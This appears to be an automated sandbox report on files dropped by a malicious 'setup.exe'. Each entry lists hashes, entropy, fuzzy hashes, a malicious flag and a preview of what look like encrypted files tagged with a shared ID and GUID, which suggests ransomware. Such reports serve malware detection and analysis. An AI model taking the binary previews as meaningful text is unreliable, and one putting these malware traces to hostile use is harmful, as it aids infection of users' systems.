              SHA-256:ADAA445AF278CC9EAA0690F253413AE9A0051331B8248D534B6D3C14C3341816
              SHA-512:25F4436559ECB5BB605BB019645F4B0B1005AE875B3D64BD0C8CBAF7213D4E08FB5246C44DBB18ECEFDBAA62AC3C3AC73482E19DAB308A0E7558566848245E08
              Malicious:true
              Preview:SQLit.ji.J.f.'%....].m.....6...[Y.B.....Z.D.....4....).0.h...I~.U].F-`-.^w.3'.)...&...t`.....4}..a#.q.t..I......QD.?7@..;.}.m...2D.f.N....uj..6i...M..L..8B....!..[.".....q...t#..Kn..P..}J.,l".R"oT?..8~\.3......Z.x.l...<.M.ZU...&....g.l...:..n.vq|..LVC-...K.5..r&E...|%z.(.S..O9.n..E.5.|:{..~+....O....o....^.vP...^...+~.E.`..........T.41...F....pA..N..n...Z.=\..5..w.T.T.......T[...v..Ht..c...g....s..JW.$.....Q+p..1.....W(.Q._.~.wk....(....J..G5....v...{.u|....w...9/..%.eL..U..5...O#..V....2*,.(."......2.3-..+.|t^%6p$.0.-..m.v.S\.]..s..(c1W6+...$)n...jx.k...~6....?..~$...h......j..f...!.,}....F..`I.G.Q..'OC...a\t....7....^&..Lj...s\.......Z%...........(...?V[.#..=[...._.^|rT:Nr.6..b..s/...I..A.a.(.G...L.".gP...>]....{a....^@..5.1..s....!*.T.N+..4.......C...C....oU...7.d.....wz..I2F..6...nb.G.4V..*|.>_......9|.....t..P{.q..m.....e..y....{.....Z'.~Y...O......R.rm.@?E.4...2.......>..B..I. ...ty.{&.fl.......*.$\.."q.W..km.p...!*+...}...h.B'.;
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):20814
              Entropy (8bit):7.990266975467968
              Encrypted:true
              SSDEEP:384:BTUqqwqCSVBoRqs+SJc3Q6r3z5kF2xuNwlJ31yF7i:hhqwqCSVWR35c3Q6kFvPVi
              MD5:3CAB9ADC40215ADA29F42FAB44FB7982
              SHA1:0B5E5E7200C00C03C69EA5CEC4D0309C1396E0A9
              SHA-256:3E60637937A82B5E79D2651AEEC2732E2DED85D3FBD61039372D0B6ADD777AD2
              SHA-512:A74C40B019F36A5409D24F20DCA3AA586D13662D0421EDD70802E12D4C56B03F2AC8997F24DD277F0046A70A31BE7CE535D66B2019C0DCDAAD77A177E24D5067
              Malicious:true
              Preview:SQLit..i%."......]P+....'.B...dB......iV.F.E......o..A.._>a0>.D..d!..@d.PZ....b.Q-}...j.......j.hldc.u.....P.|\.......bc..+...9.....I.#P...2...R....3....M..l{=r..*.....t...W.b>../..lZh....Q.{...Q.@.....&o#N.&.I.:.y...lKn...*.Yx....<..RS.YzW.Y.P.....1NU3....{(kt?. 6.................[.K*...Z...3.........Q0........M$..>d.'lpq^...a..bv.=|...KJQ.7..C.PRb^...SI.zv...I...T...6LK..f-.._...{^.X..n.......ef.....1...O`....6.'l..j.d.........T..8.X!.l.~*.uB..D....0......%.q.x.]<..;..l.U3.w7.O.W..K.e.........6.x...../A@Hu.M.F.=.T...=i./QiAVa..BoY.<. ....s..d..""Vo.Bl....W.Vj1._..ud...-p...V..K.../...se.%.bB..Lk.....:.. o...$....]...bbm..Xla."...>(.y....=...\...|O'.[..N.m.......cH....Hl..........pY..y?.#.=.L."".4.no./.{...-... f\.`.o$X...M.dt.Qq...W.`........i.G.\.w~.......F-..V..N%8N..@...^>.E.W.ZK.... .2#...C.....j.P?..._eN.LW.Ei.k.b..h..Y4..L[Y`=Z....@...|.qQi.I..{~y....?/.....m...>b.u(.t.{7.Z.>.$...I.....|.....u.L...|.)Z.\.......?{n...*.n....z..........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):543
              Entropy (8bit):7.6135812380949615
              Encrypted:false
              SSDEEP:12:qhRjMjcDEgBOXS0eLkRjNAGLoA6FHTwBvzoaavUvNhQVSPWesMR2cii9a:dWEdXSbLkRxAOoA6FzwBvsRsVhQkEbD
              MD5:D4986387FD289FDCA9AAA5A8C39509B0
              SHA1:17E8E52D4914A51C08710C262B4492A68C4BB99D
              SHA-256:C5CECE0ABA8C6F694741A4387C2B0D8767675CF9BA390754A9F0A3C905094922
              SHA-512:DB7B497E45B301E04F5E2563E2E568CC4156D8C03FAF18244E92A859F794AD45F38F632F0386C68FE10E355CE6D14CEAE7DAC3DA37F965D76DB339B53DD25575
              Malicious:false
              Preview:.f.5..m.....w...A..Z.e..V.'...#.... L1.N.........?c.._.!`4."..j&$....e.73....<........f.rp.>...s./...x..u......B...?.........Zv...a.f{b&-MV...HoB...K.:?...m.gc.PK.p.@Q..!..{..#%(IY9..h.9....~......1.....m...l5.].p@....>V......{.wE..+.....^.....l:..y.[...{..7./..{B.....Y.x.YpK..8.5.x...C....U..4e..w..Y.....$....q_.O5..}.......)...W..R..,..l....).G>..x{.<.....G...N....^...k. ...G.&%.....}...d.x8.#.I.p.)..(.......Ot3K'J...|*..T].T\G...&(.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):543
              Entropy (8bit):7.624197782242349
              Encrypted:false
              SSDEEP:12:qINaClMaA1NYuj7oiEXBXVugoi6C9FyZ2W9nhq1sMR2cii9a:XaCW1NYujUBVumz9859hxbD
              MD5:7ED4689CE0716C8A698E99E6AFB8C0CD
              SHA1:7B191A703E0FD165EF4E18801D6D71B99E1895B7
              SHA-256:A7340E4CAD0C9EF7A91AC812EDA63249964C3F8C2F58A99470EC40B84062BFF4
              SHA-512:B3429059438EDF1893799AB0EDB2BB874F05CF75DF5DABA8FEDC54A44F416154B63B797F50AE7A1D11AFB9F2E84398241A50174A628535A285C3353805674966
              Malicious:false
              Preview:.f.5.m.n....EC....#".];......Qd.#O..q.FT....|h ....B.M&.Y..X.........#.....>..f..c.z.a.Z..m....:..O.D,.\}........I....J&[.U...>I.`...U=.v..../j.Z..w.u..V..j.a..g/...d.../.!Q.U9.....M.W...m}-..-.].f.{.q..*.....B..#..?NX........tj....kI.!.u.....}...3^g{G....Q.2..(..Mtg=..K:..h..Yr.I..R..5.dM........i.........vZ.li...#...Xa).~(CaQ..Ns./+.S.9.}.Z.p...Eb.0....v..&..]Y.......#.!.....O....I..exxG.i...0.0#..J...c..\E.@Z...yg...A...4..qv..U.'#...]r..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):961
              Entropy (8bit):7.782898664717099
              Encrypted:false
              SSDEEP:24:O8H6X+P3epKdc+vAVErOgXpWxcp7A2zOPaaNHuHltKlwbQbD:OdX+8K+MAVErOg5Wap7ROpNoXKYKD
              MD5:C41D76CC46BA3A69A57C32BBFE977239
              SHA1:1749ECE7A877AEB741BB47D33AA38897A243E297
              SHA-256:CFC36748396AF6EB622B5F8C6166E9555D1B55D6B0780D8A7378430D81014AA3
              SHA-512:49EBEE2DF2C20157A93BB79AD33126907F6E24E778BFDB7358FA64BD51D5F563AAA46F688015BEDC5E99DD71934435EF84E8C11A978F3AF15A9E625E2857EE9A
              Malicious:false
              Preview:.f.5....@.G`y&.D.[\Je...U.....t.W..%..3.7....'.#5.%....}.o.ADq99...m.A.q.I..nlE.....P.aX).....h6...w..s.W1......7Y....x.N.,.N...1.iK.!...v:..*.U..cyxgY...|G...~...>20\.j.I..%...._4....K.7...?6..._..q....X=....?..c$gvl.?.3.o/M..J6...%.Kx.&...sc/.l.....8...J...$4e..od....F1O(. ..c.".Y.A....X|i.n..`..J.M...3....A..f..............'..0.y.@#v|..$.....E......d6...o..yU..1{=....Ea.\...usE.KCl..E..3.......DZ..C..h.9#O9..D7FC.......V....7T?..h..\.K..-u.........I...7......l.o%.....(...Z....F.NA].g.;..pc....Ax+...V.;9J..!.....p.=._..Es./.1J%..[.}..9.3..z..'.K..3.p..m....}.A...D.j.V.H.].....]9...$k.EP&3.0.j9.t..%U'....7.......(N.....f"XOl.Ll......`?...H..3n...<.6..@fC.*........... P..;..q.i.n.r...4....NE....y.B..z...3b.V.U.......2U%.92..T...zOv.M..>...t....."..*........#.....OF.(x..r..`....<...v....g..Brc7..B.i .T..9.'6dT.....`...Z.f.{...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):662
              Entropy (8bit):7.650182868879397
              Encrypted:false
              SSDEEP:12:keBHLL/HFQfZiUWtc2kQvFSKv1efl7R+SOsCJsMR2cii9a:JpVsA3vFSS6f+obD
              MD5:819F3CA79F94308BED648A98B2986445
              SHA1:4206AF1827E81912C2D5DDBA504B09E7ABB69E36
              SHA-256:EB5ACA15888F4CDD9B18E3DE2A215D61B8F4B654293807597F62D4B344CF3FA8
              SHA-512:5F528930BCD5FE29513DE2F3E0889B42735657FF2706B46426E02802BBFF44EDC1434C0F350564399BEF3A5CC41AD64C85852A1D5370187A56E646F8386CE69A
              Malicious:false
              Preview:2023/I .!+.!.....`.l...`...2v...3.&Y.`.M..z...Q....@.e..W-.d..Mk.;N........>.}.M";b.j\.z,.~...o.1.CZ.S.e.4....=.d<[..61.zkt ...4LC@..D>.DZ ...[Y.^.B....1v8+R.......L(.Q...jb2F/...f......w*Fa....x.h....j...ZB;g.....i..r...i.{Gv..iK.j..mL.{......2.V..&....hS&..Z.R.|..-..W...'...j./...[....9LB...J.aB.XQ./i.9...wW.O!-.v..]*5}.!.?,....^r.i..gq...^.]..E...=/Jh.4u...v+..~&...C'.g..Y...v...L'm..r.5_..5D..GC....2../0...K...r-..3..w]..q.B;.nR......n)......Sz.....r.%...*u..T.~.......F.L...H;.Y5^.%.^+6......q.n...<.mtc......>(.8....a8...h....e....68t..Y".q7s.....*..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):5316
              Entropy (8bit):7.963683510723463
              Encrypted:false
              SSDEEP:96:fg9WklHK+y7/FR8Hs5oAcoIRxObhNnVb5pd6YK+EkOKfuxJ:fg9nqDNRx5MfR8RbH43r5xJ
              MD5:4A029BB2B03D47A5AB9876DCE17A8EA3
              SHA1:DEADC8A2E847DE38A5BD8C51F3E0800B24CFBEED
              SHA-256:53E6F7592B6AFA7E76E3080DE0739B0CF11D60729F1EAAE4678528CC79F6E70D
              SHA-512:8F416A2ED1E740A77403C596B143B94B6425B9FDCFE4F57CAED4012EA11981B76EB23063E8ED53832924BD70A3FBC4A5951FBB4D69A2ABFBA7B54182D8F905CE
              Malicious:false
              Preview:.PNG.(.ThF4u.b.H...O.G....N.3.[.j...Ne..$t.."...Sa....f ?XiTx..rd....a........v.-..N.....%;....~..i..U.]J._.^D'G~a...6..A.."...l.s.Tl........_4...<...<.nA..0..........>J...Gs..R..KC...\L..o.N..1.....3...7an;P..-..._.H....|J..b/.....[.nu.v. ;.e.G*4Z.k+9.|..:.............S....H.Em...K..T..q9...RK..V....3....`.3... ...l..Q...!..7)w..7...Fa...$.P.p.2l....={;.......#.'.Tq.X.(v.21...i..[....~R...D....6zR.*....U....9N.).a9.....L.t5..}.8zkW...`.....@R3.....+...hN..9.[o&..J}F..>.........77)U..,..o....c\......6.W]E .\.v.O,.....@1.;..XxL.a....Y....R.phT..H...z...>@.pr....@.[q.......p.a.4."..(-....YZ...dJ.t`....=s..M.:...=.am"..`..<....&...Vo..A..7'...'..U.7 ..?.....(..G.vM.D.........dj.....G)<....=).Z+.g...9.3.'.W<O.r.(.Nj.. ..;...-..o......./..@S.......$.r%.....X..5.....U.#Q&@/..`...8M!DY[.....8.X.{{.(./....(.#...*..\...l..E...h.wU.OX/..o..,s.gos....<.z..R...9.../.G,.....[.A....j..q.hG.Qw..<../......,y`..l.".Y....e..+~.q}.v.p.d....B.KvlK...s;r<.*.oZ.hx'.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):18852
              Entropy (8bit):7.988201303192687
              Encrypted:false
              SSDEEP:384:MAHiSrsNlF//IqAj7BdCeuvO3SUyzbk3z9WabrEwW8UZz:MRSrsbV/Uj+TvO3Z+ExWME78Y
              MD5:FE3A2A784FCA629765910B73C01490C3
              SHA1:5AFD6AF49FCAC65FA66D40E89A87974524CB777D
              SHA-256:58BA7C70D5DD8907DEFD731F022CF6B7D8EBCC661FBA27034D9335437C6A8463
              SHA-512:8C7E5F397A63F02A7B81B1AF91E006DAF78966FEF8B1751A43F199F4EE3C30656FF307F1F99C006C792F934278F760F4A86BA8884983001D16E1204A5B15C71F
              Malicious:false
              Preview:[{"de......7]..x*.&7.......cb....|EDO./.......>O...TR{.&.n@P..L....?.....!.../.`k...q......3@#...$|R....l.1P........i..(..b._...5.w...p8.....W.....F..1S...5..`*&..Mfb0M.0.+.tY..2Ag$(.....*.........Z..B&.;...H...HK.Q.%..I.'i}..ks.Y*:=L.D.#..v3E.J...kE9.H.....r`...`j.MFt.....`\.q.<.i.y.v..k.%Gf....y...}..)Sc..q........f.J..8p.>..Q.%T.^......F.5{..j1N.LJ..w..M....?'D.N...........W...#c\.... Y....(............-.{...:{. %.mlG..../.^..<..w..[..D?..m..X.`#pb.....)....K.......v...Q~$....k..{3..Y.....e...".1%7.1.-g...\v...Gj.E.XG6(.t.m..N........>...~.qu'.......P#....!$.+..;d....(6....#..G.1...ZX.O.7..Po...S~.I...R.!.er|..G.m.d2..h............;Ov_...O...QF.../....0/...w..q.1.....{......JK.\.G...%&.q.QR......%._...............QH4.....K~.2........90....d.9...Xl..]$J.....a.gG.U..D2..p.....@.@.....9.z!k.:S.w..1?...r^..K.!.........P.l.....*z...".:.@6u.MY..B.CV.K.id...L..9A..dWzzh`..<...l<.8.tv.c./..l,<v4+X.K.v<..<.X....x..(..A.Bn...].c...q...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1188
              Entropy (8bit):7.835722184487981
              Encrypted:false
              SSDEEP:24:KKOMwfknKhG0Y0BQrsAbzC1CAwAoQMPN3mq/TbD:Kx5u0BQsT1pwrBWuHD
              MD5:406C4FAF291873BDCD2E82D5F10E3E85
              SHA1:B1C37D59EB9F13B72A1C51FEEF1B7C115059FACB
              SHA-256:4E830B118B99E7AE90EAC808CD0371BFAF14FB8395C42BF8F9A2605F9BE72822
              SHA-512:B2DD638B997D7C015B644594F0E6DB9C48589F4240799BCE85184714474BFE15FBACCE10C207B52BDE768086D73C35966B82EFA1D1D9CF6A273D004AFE13AF30
              Malicious:false
              Preview:{. ".Q.lx......O......1.c...fR...-W.1Ivp.....\.FBn....!]9T..H.....Rd....?!......}...=..QB..._b.7.^.z<..,xe.[...Z..o8...._q..@..-0".+....\.....lb.9o........S-.}[.#..O.Gu.......jy....!XcB...MX&.....:i...........o....vL...[../......N.*...w Zk.rR.|...rO....S\Y.@.H;..#Be...zW?....%..F.G..D...Hm.X.Vw..<I...Q..,.k...'].b...Yw....R%.. ..t.W.~...]....]...._..U..9(.!"').......q.JH..G.9U..Y..4...q... +*K.<..d.hL._.\].....[...U.#?..(.9............z.'_ql..<EC8..-.[B.n..|..1.#.(...e.`....h.^P.......Q.S5.V..EO..\V.}9.J..Ic.5...<.b%.....:./P.k`....=.H.1.....GL.c.......Z..o...l........f.Y..P.B.9..mAN&....D.Pb....l.o..OSR.B.!..b&P<..cM ?>..l.*.eQ....|..0..WP].4.R...h...xO...#..m04hwB.]M.H)...6.....A.2.*.z4E6..L....x.....l..../..b5pg._.......H:.9~...& "..gGG.]l=..m.......T.0.....:...u7.....Te....tS.Y....l.u..=#.F....kJP....K.k..z>...........a.:.fS..d~ 4..........<..f.@2.%.{..\ A...?....*!....U.S.).....P..C..;.g.......vw...X.6..a.i.m_^O.l....e,...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):80603
              Entropy (8bit):7.997881909040217
              Encrypted:true
              SSDEEP:1536:Y4SfeqjBIxORrVssBPfsYDrVd8ejqvehj1GO5s6BIF0ry/sl9frblUK8SoO74mK8:yfBIxORRssBMYDn8gj1P53XNZx8SoO7R
              MD5:931F324B42B8E44A6F6A2669F6181F0F
              SHA1:15F7332971C410448BA0851623C713A9224F3D94
              SHA-256:03E5F9D2D0BBF42ABACB04E4CE7B47B174B717CA01E9970A06E4D311552DC71F
              SHA-512:8296A6174C16A77CF2790B71DC918BAD00B3D3A706EC8018AED4A31BC32A973E8D11309685B958FA702450BDDF013BAF388FD714B9065029AE782A774D1CE6ED
              Malicious:true
              Preview:/*.. M3.....r.N..XV"w....r.....H.F_..@.^..8Q.@...36.|..f....R....3.:S'.Q]=.z...tT..B*....ek.Uq.x.J.C.t......h.@.}\/F2,.....:1.z._..p.Ij~..p..:w.f#&..}.........=..."..)=.J..7..p....9.w..j..t#...t....eir.......H.1.5.F.2..`=Uz~..-.@...c.....0...!.~.A56`g..H.J..pD..2?N-.*.g.*.s..E1..@...u..Y.D.....2.q...;..?.....h+...&..z.,...+..SEEYp....b.?...f......6...01..0.<...,..x..R....c.>O.....z.l..G>..8......F.....So..D 2...L&.C..V...Q8..;......t..6...u...w.|..?..z..N..G.c..q.H...c.V............7.1..\zw(.z....9.4....U.....Au....QI...Q.4Q..*...J...tW..l.pQ...;..5..qy.G.....i.#.$...x52....Y.At......x.9.).1...r-._L...yB.5/vR....F..Q.t...........V.5...b.r.2rzE=.R.u.........e....i.>...%......a..rD..S.....a.bJ.%.f.cU...MG..O5../...R.Z..>E...*..f.Q*.x....H.........Y...bQUi.%...G.\:.~.6q..e..fDZ./..O.......E.%.s....P..A.....y.2%...K...R.......8.<6K..KY.V.R...4..-.&.f..d.h.xd.C.jtd.6.[.......g.Rq..?....K...Z..v.V..X..B..z......o.\......+...7|+?|..r5.id...*....U
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2731
              Entropy (8bit):7.929737293793174
              Encrypted:false
              SSDEEP:48:3rGMK2+x5xQkJ4qHoYcnBQorTIlr8iKWG+S33hO5dPpAdvkc+017zQ7D:3CMgQyXHPcnBQqYHtG+0h6dPpAdP83
              MD5:CF1A4A1033B02169B5E4F227CA96A1A8
              SHA1:812503EFFC609033AFD5D62C4999BF460F66FE65
              SHA-256:5A8E58C3C17D0181E446EC10C458438C8D66B2ADB53574E8732311BACB0F8E0E
              SHA-512:198CE86DCBA54E75AE93E7AC9C732402B5F208D96DCBED9F0AC334440D8A72D7E4254365E985364E81EB9064F5F12D85B5197B2E32B31D32EF6356F03FCB44C2
              Malicious:false
              Preview:{.. ...S\..$..m%.i.....K.G.n....C....FK....f..qj;....<J..S..e..".........tk....b@..y......F.........J...3.F.h7M.|.H.-....L....7fJ3...l(.r...?,l;...6...[.?.^...4.L.f3.....)..J!......d..U.t.v.I>..F.3.r....{.B.l..P.q..yL..'~..-k......cS#.e.c..*.........T}...2).....=..u.%...Uo.......E..p...^T.e....b.~.7.2.8.|..`....C..p%-.......9.i0.........dK..G...%?.'k......V...'.k~..Ky..Tv4..*0.s....@.N...y#..&....x....T...g)O..a#=gmET1... u.h...`.P.X......7a.o..oR...*....f@{ -..;.y....w.D:..-......Y.".?Z..vI.}.u. +...._.G...\.^..5.|....F..{ .=..W..M..s.ZD.......5%......y........|~.......]~..R@..2.irF..........'T.G....r....S.F........V!...t7..I..&_.d`*.?..!..B5..tg^M.......L...i=..2.?Q,.4(...,l.>WB..Qyg6.j....h.S./...J-..1..........n4...X..M....?.:..KX[.. ...B.....d,6 .sZ...B!a.+...{-.. Q......7..M.@.s...?.%Quol.....7...+F.......1...r..8I'....,s.c.9..Y.y.Su.....L.42FN..............9.w.Q....+...j......q...{....;yh.1.,Y.<.?....&f.`.B1.n.3...d.%..xQ..}.{
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):625
              Entropy (8bit):7.667609687067435
              Encrypted:false
              SSDEEP:12:22jfQ3Su6puF8v1nLDSpQOV8C/Bfx5225NCOt4i7sHYluW/sMR2cii9a:22rQiNu8vtLDivh04YOt4eEYAbD
              MD5:549F9DCA52D363654CFC395202C6FFEE
              SHA1:C920F7D4882D7350CD5113AF075E7B79132005C7
              SHA-256:3F5334F9E4097E443E181C178547981F01687CCCF77C30AD5D4F587BE0F04DC0
              SHA-512:43C1BEDF0D76F26D99FD7A078C5A511570C02BACD96A0D249D215722B21B300741BD9C37811CCC76114B3C1299591C6ED765D09066362CB323761C422E4F6E17
              Malicious:false
              Preview:(func..).S...JP...h:.g`X...b.`..vX$.,i.H...U.5..{5!.gt..E.n1.K....M.|.pi...7p..(o..p.F...(2.6+...\w.<(z.)....{. ..Q..-.C..e.4......@.........9w..{C7.s...y%.......9.......M...Y T:.Q..-.\Vj._L.......^Q".N.Y..h.=...D8...(. A8....b...=.2O'....S.h..+.4.k..~ml.u9.xj..C...w..*.,..w+`wq....w)\...u...s<...5.6....dF.M.9..n....R...t..^.s..."......k.uy.......S.......L......f...(...6..w.w.1P.&.k9....G...`.x.8.<_.l<;.;.U...r....E........aB../...V..?&#v.#..~r...V$.).v........e..S...............[......^...g..IS.?.#.7.,p./.h#.R%\VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):763
              Entropy (8bit):7.7037393767691045
              Encrypted:false
              SSDEEP:12:Y8LI6tK2T8pNjiECjdPPrdSioPkWOP50R9L5W6z7l81bYIa8yX/IkNdcJsMR2ciD:YaIlnNjibjdPDRo8/50k6z+1bQAkNKWX
              MD5:8CE2026A17F508942D553294D173D57A
              SHA1:C495FA554E4CDE7C718D7BB77AD36DB1AE79DA26
              SHA-256:169EE59F4BA7B4AF099457E2BCC32184DE862D1345A7471DF506F649B27CF1A7
              SHA-512:1B1224551A9D44B2E8AE8AFD7419A3F2275FA45114BF3D32B43C4B1B9CA7B9D96BEEE130EF13389655DD4934F09A23572FBF38B3D5502FAFCECEA9505E95FEF6
              Malicious:false
              Preview:{"fila.....M..7%..#.......!B.@V.A..A.1>4A...Y.3.....*....wP...\.kq. .47.;...S.[V..O.....Lnl.J...pd].K......0K.,a..78Z..UC.....\Q....D~._.|...}...O`j..`..NML.&3.Q..&...]...v.`4.b..O...#..8..`.i..$Jk.q7.e..p..}.(i..g..4......=..M+w.....nDw;CgF...%...(...).&5,=......:.D....{.Vj..?.r.*s...p...f....n.....t..0.X.Z....gN...E..E..+ZO..][t].~..&.^.`........5"+a......:H.%?......n....(.u.j ....Z.`.o...*.~Q^.&..~2e+8.N.iQ.A... Zs....%..FL#..E..9. ...eo..9............Z}..Te.h..e../.....-.K...H..Rs.7.tXd....9...........\....m...0~D....q...C.;...?....wT(..!..kn...nA.\d..i.@(W..Qf...?$.SV.U.du{e..3../w.dv*..I.g...(..?......}.f...{{.<..J"..X.iO..K..2..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:GeoSwath RDF
              Category:dropped
              Size (bytes):2087
              Entropy (8bit):7.912253918940599
              Encrypted:false
              SSDEEP:48:AcRRyJkL43r8Wj+xcO1+tvBqSIlcEesmnUfjtyMgjBD:ALy1OvBIlcvsVfjXip
              MD5:90990113C2561C4E6511A02DFA9CD598
              SHA1:F0F14FF0C284AAA326706F1BB1B5D7D3377528AE
              SHA-256:5F78277F60A94CC048EC1DBF55A81BDB457FEBD5E279ADACAEB5F1462F5EF2A0
              SHA-512:A47BC17226920094AE116409E0C626D5ED4E8F504BBEE0684EF538F9F5F370925CE029A1BE5C94F245C032D33CF851B1BC4DBD2C7D8913D6A82758299BEBCB66
              Malicious:false
              Preview:[.. ..}.-..........jA...P...(.~..u..(;%a...U.u..!..Nlf..{..6Pw..C....GK...A.....g.w...b..s.S6X....=p..ED...s.......|.Y....Ak......O^..7...y.%.......K.Q.5..@y...QD..>.h.if.PvLN.28....3......9F....@E.o..g..*.\.+b.;..Z.....e..b.7;.t$hY}.L.t..\..Z. .Pc...p;}|...@.>..)...>.Q.8{....6Yaz.|.J.V!.L.'yk....>..uVF.ap...DX..m-.;...*.t9.=S..q.R.z.7}..E.:......J..`..!1F4.=X.AE..u..C.E.......Rqcg....[V.s.BL. E...5Dl....K..;.>.o.)....;..q.Tl....<.nz.+..V..q.BUR..h...3...r..rS.e.....`..PoH..9..9].$B....;pG(s..\....s:...J.t.v{......k...0k....Y.}....@..mZ.2.-s.......*..{.+..O....a...g...j.....^.u*..F.......f;6.s..O^q...x5.O@8JGy...>......z..2....cI.....T.y.&.l....(..!..U+.a.!c......i..P.%....^..|:e^...cO....k.a.?.D.A8,S1..p.....F.hR..L.@..U..uft..d.......^.....t.......u.Iw...1..)\..W..].M.......l...tX.../.V..X!......w.".L..F..3brI.B..a.l...4..j.f.Nv....I.._9.a=H...;...kV...KX3...q...)?B<....]m.c..P......Q. soC... ..._...E....H.Y..._s..D..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):9751
              Entropy (8bit):7.981204169518101
              Encrypted:false
              SSDEEP:192:MIC+OQYWWZAYd61KaVlSHxOza+wgva4NsHDCf/07o0+:MIlFYXaiHEc+FNsXg
              MD5:39C9AB601EBCE236D77076B82351D72A
              SHA1:FFF1F8E36FFDAF0B1FE79B40A7BFEFE0B03E0A14
              SHA-256:63117ED4A21456A499AC3DBA34C08ACC32944BA7F0194A890791E6D1C24B4469
              SHA-512:CAA7FABE0639F3F5C3026802BD8F08EA6DF158B9AAE6CA5268EC36CC272F8FEC68099C9932CE387B954BF2C59525CD4E30B9412689D8BF396287833EA76CDE6F
              Malicious:false
              Preview:(()=>...{..V&t..W.yu,.>.Z....:lXL.=.G..bX^..T.9,r...DF..V 7....UT..?i[..z........)n(}........u.......!.y..R..a.....#...5~.rU.6s.A...-..-8&.......0(F.T..;\..}.W.r,.X...L......q.'Zh^K.^zZ.x.A.=.....M..(- ....F4b...T..U..z.......3..qo.0,. ..!.V|<;-..i...]...X.V..N@..4.s.A....1..._.<.fC3Ez~..k.0U.I.J.e.Z....).tq.....'}5.:...V......npZ..5..p.G.GN..tX6..,jy..Q..U..W.......'..>a...k,......*o.C}H....o]x....+...jWwr$.....^G.4iWl.-..w!...K,M...ix....C..P.j..\n......5&.1.V.....c.F...6.....S..K5.+...%x.^b...B..v....p<[..Ie=..6@....?.E.$..j.:..c...t...Pp.?.............#..'.Q:A....9Z..q..g.....v+...vo.L".b.*..}k......5.........T-<.[..%_X..k...R.L.[8.T*.:.E....-.n..6......(i;...cK.3.v:J..a..<)..qJ...Zg^....g.3..s.[._..._.......Z....\0<..6. ..VI..HB.....h....kp.m.h.kE.Z....,....r..=/.j...C...2h<.......65.e6Hr.O...0.`z......J.....S.O.d#CW\..d....w..F.].."....m"?...E.$B...aL...NY...RC'_.a.3...1@.....ed...n....{'..'.....(......:a...h.N.....Hq.,.1[w..p.t...s(J..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):10104
              Entropy (8bit):7.980447314631381
              Encrypted:false
              SSDEEP:192:TEY+Iw9y7go5v/+ULToJGUyjwg+N+7hu+Dh+9UONRA/8/MgsJw2:TddlN/+U/2y7hu+uxN28UgsJw2
              MD5:BB7119CDD94159617C52548D420D61EA
              SHA1:D136A07AAF37BBB4112DDDE6C8C0250C15F637E4
              SHA-256:F5CD48D0A4C8C4A510847B4C82B68D88B840CD00E0120D8D5BE70D0CFA7E970C
              SHA-512:4CD609C021123352E4E95394861F018660DF119BB63A5B19488CD6D676F9BC143A6189BED81C93C7BE0CBDC6DAF8BD40E5052B018B4F27B81AFFA226C86BE83E
              Malicious:false
              Preview:(()=>E.?*.t.?.h.Rg...i.O......2E.E/....Sb.q..Fi.h..r.<..|.8.M.d....q...A...-r.]I.S3r3....P..L>...>K..q"|..`. 6..M&..=9r.v..9.K...~..|.$p.W....%r..a..F|+7e..1..px......\./.N=7T1.a.,.30Z`...u...F..[..7.....O|.W.aTyN...3....].C*g.7lV. .....a^..Hl....[......3&7....!...s....7#.a\5]r....>i.....P.....x.;.pN.jw.. U?..O.......s..,~.-.j.n-.xPYGE...m.u.I.!.W...5<Y.B....S.fE.e}.....|...Mt...Ln...~..K...%.....l..d0CM5.1..i....[.*fg.%..%....%t.M...v.9Z..X...pwHx.M.7........@....;...t....|.P..p...Ny..z..?...A.D.'.3...%9I......v..%$O...K..x8.....Sb..Z..................F.cd....Z){k.4..v ..Z..."....C.kS...E7U...p..d..(d........{..R..i....O........;.6.X.#l....=]r......>.P.X.V..4.{.:B..|a..K...CsJ........i..+r..$.D..|&.o.4%.K....1......LD...Q..S.3...9.C..r.d/.kE.i.;\.t...Fy...n..\9...2...gk..1.....{Q.#a...../.*.)xnPwE...&h..Y...N.SxE...G....n|F...h.lt..........t.2..5M.S.^B.......D......K...._...5.K.eh...x..p....:z..u..9WV9?..TE..b..]..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1296
              Entropy (8bit):7.831698303997526
              Encrypted:false
              SSDEEP:24:FWrEtk3+xy3wk1ccLw/31HWSu1wHeZMq9vkO9ybD:TkOx8wzcLA1HWS1q4ND
